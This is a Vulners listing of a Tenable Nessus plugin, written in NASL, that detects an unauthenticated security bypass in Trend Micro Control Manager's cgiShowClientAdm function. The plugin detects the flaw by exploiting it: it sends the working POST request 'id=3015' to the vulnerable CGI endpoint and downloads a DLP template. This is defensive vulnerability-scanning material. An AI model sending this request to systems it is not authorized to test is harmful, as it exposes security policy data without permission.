Lucene search
K

Trend Micro Control Manager cgiShowClientAdm Security Bypass

🗓️ 28 Apr 2017 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 107 Views

Trend Micro Control Manager cgiShowClientAdm Security Bypass vulnerability allows unauthenticated remote attackers to modify DLP template

Refs
Code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(99730);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2026/04/22");

  script_bugtraq_id(97541);
  script_xref(name:"ZDI", value:"ZDI-17-244");

  script_name(english:"Trend Micro Control Manager cgiShowClientAdm Security Bypass");
  script_summary(english:"Attempts to access cgiShowClientAdm functionality to download a DLP template.");

  script_set_attribute(attribute:"synopsis", value:
"A CGI application running on the remote host is affected by a security
bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Trend Micro Control Manager running on the remote host
is affected by a security bypass vulnerability when processing calls
to the cgiShowClientAdm() web function due to a failure to provide
authentication for the functionality that exposes, modifies, or
deletes DLP templates involved in filtering. An unauthenticated,
remote attacker can exploit this issue to modify the security posture
of the underlying product.

Note that this plugin attempts to download a DLP template. Also,
Trend Micro Control Manager is reportedly affected by additional
vulnerabilities; however, Nessus has not tested for these.");
  script_set_attribute(attribute:"see_also", value:"https://success.trendmicro.com/solution/1116863");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-244/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Trend Micro Control Manager version 6, build 3506.

Note that version 6.0 build 3506 requires version 6.0 SP3 Patch 2 as a
prerequisite.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"manual");
  script_set_attribute(attribute:"cvss_score_rationale", value:"Tenable score for security bypass.");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/28");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:trend_micro:control_manager");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2026 Tenable Network Security, Inc.");

  script_dependencies("trendmicro_control_manager_detect_unauth.nbin");
  script_require_keys("installed_sw/Trend Micro Control Manager");
  script_require_ports("Services/www", 443);

  exit(0);
}

include("http.inc");
include("install_func.inc");
include('report.inc');

app = "Trend Micro Control Manager";

# Exit if TMCM is not detected on the target
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:443, php:TRUE);

# Exit if TMCM is not detected on the port
install = get_single_install(
  app_name : app,
  port     : port
);

url = "/controlManager/cgi-bin/cgiShowClientAdm.exe";

http_set_read_timeout(15);

res = http_send_recv3(
  method : "POST",
  port   : port,
  item   : url,
  data   : "id=3015",
  content_type: 'application/x-www-form-urlencoded',
  exit_on_fail : TRUE
);

if (res[0] =~ "^HTTP/[0-9]\.[0-9] 502")
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, build_url(qs:install['path'], port:port));
}
else if (res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
  if (res[2] =~ "SAPolicy\s+template_version")
  {
    matches = pregmatch(string:res[1], pattern:'filename\\s*=\\s*"([^"]+)"');
    if(matches) file = matches[1];
    else        file = "DlpTemplatExport.dat";

    var report_items = {
      'requests' : [http_last_sent_request()],
      'file'     : file,
      'output'   : chomp(res[2])
    };

    report::build_and_report(port:port, severity:SECURITY_HOLE, report_items:report_items);
  }
  else
  {
    audit(AUDIT_RESP_BAD, port, "an opcode 3015 request. Unexpected response body");
  }
}
else
{
  audit(AUDIT_RESP_BAD, port, "an opcode 3015 request. Unexpected response status: " + chomp(res[0]));
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation